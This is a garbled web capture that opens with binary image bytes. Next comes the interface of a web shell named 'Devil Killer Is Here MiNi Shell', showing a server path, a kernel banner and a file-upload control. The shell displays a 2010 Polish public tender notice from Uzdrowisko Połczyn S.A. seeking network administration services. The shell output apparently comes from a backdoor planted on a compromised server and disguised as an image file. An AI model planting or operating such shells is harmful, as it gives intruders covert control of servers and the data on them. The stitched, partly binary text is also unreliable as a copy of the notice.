JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100223/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100223/51258-N-2010.html

<p class="kh_header"><b>Połczyn Zdrój: Obsługa i administrowanie siecią komputerową Uzdrowiska Połczyn S.A.
 w okresie 24 miesięcy od dnia podpisania umowy</b><br>
<b>Numer ogłoszenia: 51258 - 2010; data zamieszczenia: 23.02.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Uzdrowisko Połczyn S.A. , ul. Zdrojowa 6, 78-320 Połczyn Zdrój, woj. zachodniopomorskie, tel. 943662424 w.328; 3662626 w.317, faks 94 3662470.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.uzdrowisko-polczyn.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Obsługa i administrowanie siecią komputerową Uzdrowiska Połczyn S.A.
 w okresie 24 miesięcy od dnia podpisania umowy.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Obowiązki wykonawcy 
2.1.  Administrowanie i obsługa sieci strukturalnej - komputerowej w następującym zakresie:
1)	Obsługa eksploatacyjna sieci strukturalnej i wszystkich komputerów podłączonych do sieci komputerowej i znajdujących się poza siecią komputerową:
a)  kontrola poprawności funkcjonowania sieci oraz sieciowych systemów operacyjnych  (Novell Netware 5.0 , MS Windows 2003 Server SBS, MS Windows 2003 Server Standard, Linux )
b)   nadzór (monitoring) nad obciążeniem poszczególnych odcinków sieci,
c)	wykrywanie i eliminowanie przyczyn ewentualnych nieprawidłowości działania sieci,
d)	merytoryczne prowadzenie spraw związanych z poważnymi naprawami sieci.
2)	Obsługa eksploatacyjna urządzeń dostępowych do Internetu:
a.	kontrola poprawności funkcjonowania routera-firewalla na przyłączu do Internetu,
b.	sprawdzanie zawartości logów pod kątem sposobu wykorzystania przyłącza do Internetu - wykrywanie i zgłaszanie zdarzeń niezgodnych z potrzebami służbowymi,
c.	monitorowanie prób włamań do sieci z zewnątrz i podejmowanie stosownych działań zapobiegawczych,
d.	konfigurowanie oraz nadzór nad funkcjonowaniem serwera WWW strony Internetowej Uzdrowiska,
e.	konfigurowanie, utrzymanie i obsługa systemu poczty elektronicznej,
3)	 Współdziałanie w procesie rozbudowy systemu informatycznego UP SA :
a.	doradztwo techniczne,
b.	reprezentowanie UP SA w innych jednostkach w zakresie związanym z siecią informatyczną i jej rozbudową ,
c.	wydawanie opinii technicznych dotyczących sieci i jej rozbudowy,
d.	inicjowanie zmian mających na celu poprawę działalności sieci informatycznej,
e.	inicjowanie zmian mających na celu obniżenie kosztów działania sieci informatycznej oraz obniżenie kosztów innych czynników mających wpływ na system informatyczny Zamawiającego.
4)	 Przygotowywanie na wniosek Zamawiającego projektów rozbudowy / modernizacji sieci informatycznej.
5)	Przedstawianie Zamawiającemu pełnego schematu sieci informatycznej  z uwzględnieniem bieżących aktualizacji np. o nowo zainstalowane gniazda itp. (zapewnienie Zamawiającemu dostępu do aktualnego, bieżącego schematu sieci informatycznej),
6)	Przedstawianie projektów instalacji nowych punktów końcowych sieci,
7)	Przedstawianie projektu instalacji i konfiguracji elementów aktywnych sieci.
8)	Bieżąca rozbudowa sieci teleinformatycznych do zaistniałych potrzeb.
9)	Prowadzenie archiwizacji wszystkich aplikacji sieciowych.
10)	Dokonywanie zmian cenników kas fiskalnych.
11)	Prowadzenie na serwerach Wykonawcy stron Internetowych Uzdrowiska oraz Biuletynu Informacji Publicznej , Wykonawca zapewnia limitowany rozmiar 10 GB serwisu WWW oraz nadzór nad poprawnością działania i udostępni stronę BIP zgodnie z obowiązującymi przepisami. Wszelkie informacje ze strony głównej Uzdrowiska oraz BIP Wykonawca przeniesie z obecnie działającego Serwera. Termin przeniesienia: 10 dni od dnia podpisania umowy.  Wykonawca jest zobowiązany wykonać pierwszą wersję BIP wg dowolnej struktury, zgodnie z obowiązującymi obecnie przepisami. Wykonawca jest zobowiązany wykonać w ciągu 40 dni od dnia podpisania umowy drugą wersję BIP wg wzoru, struktury obowiązującej obecnie w Uzdrowisku Połczyn S.A. Wykonawca zapewnia, że całość majątkowych praw autorskich do BIP przysługuje lub przysługiwać będzie, najpóźniej od chwili dostarczenia takiego oprogramowania w wykonaniu Umowy, w całości Wykonawcy. Z dniem przekazania na serwer oprogramowania BIP autorskie prawa majątkowe do BIP wraz z kodem źródłowym przechodzą w całości na Zamawiającego. 
12)	Konfigurowanie oraz utrzymanie na serwerach Wykonawcy systemu poczty elektronicznej o limitowanej ilości kont pocztowych maksymalnie 300 szt. oraz limitowanej wielkości 2 GB na skrzynkę.
13)	Okresowy - raz na kwartał przegląd i czyszczenie wszystkich jednostek komputerowych i urządzeń peryferyjnych. 
14)	Nadzór nad poprawną pracą  oraz obsługa serwerów (instalacja aktualizacji oraz poprawek sieciowych systemów operacyjnych ), wykonywanie napraw sprzętowych 
14)   Prowadzenie szkoleń z zakresu obsługi aplikacji i komputerów dla pracowników  zatrudnionych i  nowo zatrudnionych.
15)   Prowadzenie rejestru (ewidencja) urządzeń każdego stanowiska komputerowego.
16)  Prowadzenia polityki bezpieczeństwa i kontroli nad pracownikami zajmującymi się przetwarzaniem danych osobowych.

2.2	Administrowanie i obsługa aplikacji:

1)	Oprogramowania SANATOR
a.	Prowadzenie rejestru użytkowników i nadawanie uprawnień
b.	Przyjmowanie uwag od pracowników i pomoc techniczna w obsłudze systemu Sanator 
c.	Wprowadzanie zmian konfiguracyjnych na potrzeby pracowników w tym także obowiązujących cenników
2)	Oprogramowania CDN OPTIMA
a. Prowadzenie rejestru użytkowników i nadawanie uprawnień
b.	Przyjmowanie uwag od pracowników i pomoc techniczna w obsłudze systemu CDN OPTIMA
c.	Wprowadzanie zmian konfiguracyjnych na potrzeby pracowników
d.	Zgłaszanie błędów i zmian do systemu do producenta programu  
e.	Aktualizacja i instalacja nowych wersji oprogramowania na stacji roboczej i Serwerze
f.	Tworzenie raportów
3)	KS Apteka
a)	Prowadzenie rejestru użytkowników i nadawanie uprawnień
b)	Przyjmowanie uwag od pracowników i pomoc techniczna w obsłudze systemu KS Apteka
c)	Wprowadzanie zmian konfiguracyjnych na potrzeby pracowników
d)	Zgłaszanie błędów i zmian do systemu , do producenta programu  
e)	Aktualizacja i instalacja nowych wersji oprogramowania na stacji roboczej i Serwerze
4)	KSSWD99 , KS PPS
a)	Prowadzenie rejestru użytkowników i nadawanie uprawnień
b)	Przyjmowanie uwag od pracowników i pomoc techniczna w obsłudze systemu KSSWD99 , KS PPS
c)	Aktualizacja i instalacja nowych wersji oprogramowania na stacji roboczej i Serwerze
5)	Kadry i Płatnik , Płace 
a)	Prowadzenie rejestru użytkowników i nadawanie uprawnień
b)	Przyjmowanie uwag od pracowników i pomoc techniczna w obsłudze systemu
c)	Wprowadzanie zmian konfiguracyjnych na potrzeby pracowników
d)	Zgłaszanie błędów i zmian do systemu , do producenta programu  
e)	Aktualizacja i instalacja nowych wersji oprogramowania na serwerze i stacjach roboczych
6)	Żywienie
a)	Prowadzenie rejestru użytkowników i nadawanie uprawnień
b)	Przyjmowanie uwag od pracowników i pomoc techniczna w obsłudze systemu
c)	Wprowadzanie zmian konfiguracyjnych na potrzeby pracowników
d)	Zgłaszanie błędów i zmian do systemu , do producenta programu 
e)	Aktualizacja i instalacja nowych wersji oprogramowania na stacji roboczej i Serwerze
7)	Oprogramowania Kuracjusz BetaSi
a)	Prowadzenie rejestru użytkowników i nadawanie uprawnień
b)	Przyjmowanie uwag od pracowników i pomoc techniczna w obsłudze systemu Kuracjusz
c)	Wprowadzanie zmian konfiguracyjnych na potrzeby pracowników.
d)	Tworzenie raportów
e)	Nadzór nad aktualizacjami oprogramowania
8)	Oprogramowania NFZ-KO, System Rozliczeń Uzdrowisk, SZOI, SIMP, SNRL
a)	Prowadzenie rejestru użytkowników i nadawanie uprawnień
b)	Przyjmowanie uwag od pracowników i pomoc techniczna w obsłudze systemów udostępnianych przez NFZ
c)	Wprowadzanie zmian konfiguracyjnych na potrzeby pracowników.
d)	Tworzenie raportów
9)	Innych pozostałych oraz aplikacji, które obsługują sprzęt medyczny
2.3	Warunki świadczenia usług:
1.	Usługi będą świadczone w dni robocze w godzinach od 7.00 do 15.00.
2.	Przystąpienie do usuwania awarii po zgłoszeniu serwisowym:
- w przypadku awarii pojedynczych stacji roboczych , drukarek w ciągu maksymalnie 2 godzin - w godzinach pracy serwisu (to jest od poniedziałku do piątku, w   godzinach od 7.00 do 15.00),
- w przypadku awarii paraliżującej pracę systemu w ciągu 1 godziny, od momentu  powiadomienia - w godzinach pracy serwisu, w dni wolne od pracy w ciągu 3 godzin od momentu powiadomienia.
W dni zakończenia i rozpoczęcia turnusów kuracjuszy z NFZ i ZUS oraz w dni robocze Zamawiający wymaga możliwości kontaktu z Konsultantem drogą telefoniczną lub pocztą elektroniczną w godzinach 9.00 - 20.00, niezależnie od innych postanowień umowy.     
W przypadku powiadomienia o awarii paraliżującej pracę systemu w godzinach 20.00 - 06.59 czas powiadomienia jest liczony od godziny 7.00  
3)	Dostępność od poniedziałku do piątku , w godzinach od 7.00 do 15.00 co najmniej jednego pracownika działu wsparcia technicznego Wykonawcy w siedzibie Zamawiającego, który zapewni ciągłość i prawidłowość funkcjonowania systemu informatycznego.
4)	Posiadanie oprogramowania realizującego funkcje Help Desku oraz umożliwiającego zdalną pracę w oparciu o bezpieczny protokół SSL bez konieczności modyfikowania konfiguracji urządzeń brzegowych Zamawiającego i naruszania jego zasad bezpieczeństwa
5)	Posiadanie zaplecza serwisowego.
6)	Posiadanie własnych serwerów i oprogramowania do utrzymywania i obsługi stron www i systemu pocztowego uzdrowiska,
7)	Wszelkie prace związane z realizowaniem przez Wykonawcę umowy muszą być zgodne z obowiązującymi aktami prawnymi, a w szczególności Zamawiający wymagać będzie bezwzględnie, aby świadczone usługi zgodne były z:
- Ustawą o rachunkowości dnia 29 września 1994 r. (Dz.U. z 2002 r., Nr 76, poz. 694 z późn. zm.),
- Ustawą z dn. 29 sierpnia 1997 r. o ochronie danych osobowych (Dz. U. z 1997 r., Nr 133, poz. 883 z późn. zm.),
- Rozporządzeniem Ministra spraw Wewnętrznych i Administracji z dn. 29 kwietnia 2004 r. w sprawie dokumentacji przetwarzania danych osobowych oraz warunków technicznych i organizacyjnych, jakim powinny odpowiadać urządzenia i systemy informatyczne służące do przetwarzania danych osobowych,
- Ustawą dnia 30.08.1991 r. o zakładach opieki zdrowotnej (Dz. U. nr 91, poz. 408 z późn. zm.),
- Przepisami wykonawczymi do ustawy z 30.08.2001 r o zakładach opieki zdrowotnej w sprawie sposobu jej prowadzenia oraz szczegółowych warunków jej udostępniania,
- Przepisami wewnętrznie obowiązującymi u Zamawiającego.
1.	Gdyby dla prawidłowej pracy sieci komputerowej w opinii Wykonawcy istniała konieczność wykonania innych prac niż wymienione w § 1 ust. 2  Wykonawca ma obowiązek wykonania tych prac w ramach niniejszej umowy.
2.	Integralną część umowy stanowią następujące dokumenty :
Specyfikacja Istotnych Warunków Zamówienia z załącznikami dotycząca postępowania o sygnaturze 6-ZP-2010. Komplet oferty Wykonawcy złożonej w przetargu nieograniczonym o sygnaturze 6-ZP-2010.
3.	Zamawiający nie wyraża zgody na powierzenie wykonania całości  zamówienia lub jego części podwykonawcom
  Informacja dla Wykonawców:
Przybliżona liczba komputerów w sieci teleinformatycznej 85 szt. , prognozowany wzrost do ok. 100 szt.
Liczba komputerów poza siecią 5 szt.
W większości systemów jest Windows XP pozostaje ok. 5 Windows 98 ok. 3 DOS, ok. 4 Vista Business 
W obiektach  Uzdrowiska  połączenia między budynkami są wykonane światłowodem w samych budynkach jest sieć kablowa kat 5 do obiektu najdalej odległego jest (ok. 3 km ZLU Borkowo) jest wykonana sieć bezprzewodowa 11MB/s . Certyfikatów producenta brak. 
W Uzdrowisku są 4 serwery Windows 2003 SB 10 użytkowników Server, Linux, Novell netware 5.0 ok. 15  użytkowników znajdują się w dyrekcji w pozostałych obiektach są szafy dystrybucyjne (4 obiekty) z Switchami CISCO, 3COM..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Przedmiotem zamówienia uzupełniajacego będą usługi tej samej kategorii, do wielkości nie przekraczającej 50% wartości zamówienia podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 72.00.00.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Zamawiający żąda wniesienia wadium w wysokości 1000,00 złotych ( słownie : jeden tysiąc złotych).  2. Wadium należy wnieść przed terminem składania ofert tj. do godziny 10:00 dnia 04.03.2010 r. 
3. Wadium może być wnoszone w jednej lub kilku następujących formach:
- w pieniądzu przelewem na rachunek bankowy ;
- poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej,   z tym , że poręczenie kasy jest zawsze poręczeniem pieniężnym;
- gwarancjach bankowych;
- gwarancjach ubezpieczeniowych;
- poręczeniach udzielanych przez uprawnione podmioty.
3.1. Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy: 
Bank Zachodni WBK nr 77 1090 2662 0000 0001 0262 0438

4.	Zwrot i zatrzymanie wadium następuje zgodnie z art.46 ustawy Prawo zamówień publicznych.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>. Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert; W przypadku składania oferty wspólnej ww. dokument składa każdy z Wykonawców składających ofertę wspólną.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- kopia certyfikatu Microsoft Small Business Server Specialist przez co najmniej jednego, zatrudnionego w pełnym wymiarze pracy serwisanta,
- kopia certyfikatu CISCO CCNA, przez co najmniej jednego, zatrudnionego w pełnym wymiarze pracy serwisanta,
- w przypadku braku certyfikatów Zamawiający żąda referencji potwierdzających doświadczenie w obsłudze sieci komputerowej, szkielet sieci  powyżej 50 komputerów i opartej na routerach CISCO oraz doświadczenia w pracy z serwerami Microsoft. Zamawiający dopuści Wykonawców, wykazujących przynajmniej 3 -  letni okres doświadczenia pracy w powyższych warunkach.  Wykonawca jest zobowiązany przedstawić
minimum 1 referencje z ostatnich 5 lat za realizację podobnego zadania ( ilościowo-wartościową) a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie. Referencje muszą uwzględniać:
 - dane dotyczące odbiorcy (pełna nazwa, adres siedziby i nr telefonu),
- przedmiot umowy, 
- okresu realizacji (data rozpoczęcia i zakończenia) - każda pozycja wykazu ma być uzupełniona dokumentami , potwierdzającymi istotą swojej treści należyte wykonanie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>4)	Posiadanie oprogramowania realizującego funkcje Help Desku oraz umożliwiającego zdalną pracę w oparciu o bezpieczny protokół SSL bez konieczności modyfikowania konfiguracji urządzeń brzegowych Zamawiającego i naruszania jego zasad bezpieczeństwa
5)	Posiadanie zaplecza serwisowego.
6)	Posiadanie własnych serwerów i oprogramowania do utrzymywania i obsługi stron www i systemu pocztowego uzdrowiska,</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>3)	Dostępność od poniedziałku do piątku , w godzinach od 7.00 do 15.00 co najmniej jednego pracownika działu wsparcia technicznego Wykonawcy w siedzibie Zamawiającego, który zapewni ciągłość i prawidłowość funkcjonowania systemu informatycznego</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">referencje</p></li>



</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
